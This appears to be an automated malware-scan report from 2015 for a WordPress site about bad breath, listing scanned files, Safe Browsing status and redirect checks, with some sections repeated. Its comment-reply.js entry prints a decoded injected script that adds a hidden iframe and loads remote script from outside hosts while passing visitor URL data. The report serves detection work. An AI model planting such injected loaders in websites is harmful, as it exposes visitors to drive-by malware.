Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=badbreathexposed.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://badbreathexposed.com/ | 200 OK Content-Length: 13349 Content-Type: text/html | clean |
http://badbreathexposed.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 95969 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=c Antivirus reports:
| ||
http://badbreathexposed.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 4991 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url= OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://badbreathexposed.com/wp-content/themes/heliumified-reloaded/js/frontend.js.php?c=1&ver=1.0 | 200 OK Content-Length: 4350 Content-Type: application/x-javascript | clean |
http://badbreathexposed.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 30476 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } method = this.attr('method'); action = this.attr('action'); url = (typeof action === 'string') ? $.trim(action) : ''; url = url || window.location.href || ''; Antivirus reports:
| ||
http://badbreathexposed.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1 | 200 OK Content-Length: 7008 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, options) { jqForm.fi Antivirus reports:
| ||
http://badbreathexposed.com/about-us/ | 200 OK Content-Length: 11792 Content-Type: text/html | clean |
http://badbreathexposed.com/articles/ | 200 OK Content-Length: 23219 Content-Type: text/html | clean |
http://badbreathexposed.com/contact-us/ | 200 OK Content-Length: 12921 Content-Type: text/html | clean |
http://badbreathexposed.com/2011/09/25/what-are-the-causes-of-halitosis/ | 200 OK Content-Length: 21386 Content-Type: text/html | clean |
http://badbreathexposed.com/feed/ | 200 OK Content-Length: 42552 Content-Type: text/xml | clean |
http://badbreathexposed.com/wp-content/uploads/2011/10/Fear-of-the-Dentist-image.jpg | 200 OK Content-Length: 8772 Content-Type: image/jpeg | clean |
http://badbreathexposed.com/test404page.js | 404 Not Found Content-Length: 10631 Content-Type: text/html | clean |
http://badbreathexposed.com/2011/09/24/can-diabetes-be-the-cause-of-smelly-breath/ | 200 OK Content-Length: 22375 Content-Type: text/html | clean |
http://badbreathexposed.com/wp-content/uploads/2011/09/diabetes-is-a-cause-of-halitosis-image.jpeg | 200 OK Content-Length: 6122 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: badbreathexposed.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 19:16:35 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://badbreathexposed.com/xmlrpc.php
GET / HTTP/1.1
Host: badbreathexposed.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 19:16:35 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://badbreathexposed.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: badbreathexposed.com
Referer: http://www.google.com/search?q=badbreathexposed.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: badbreathexposed.com
Referer: http://www.google.com/search?q=badbreathexposed.com
Result:
The result is similar to the first query. There are no suspicious redirects found.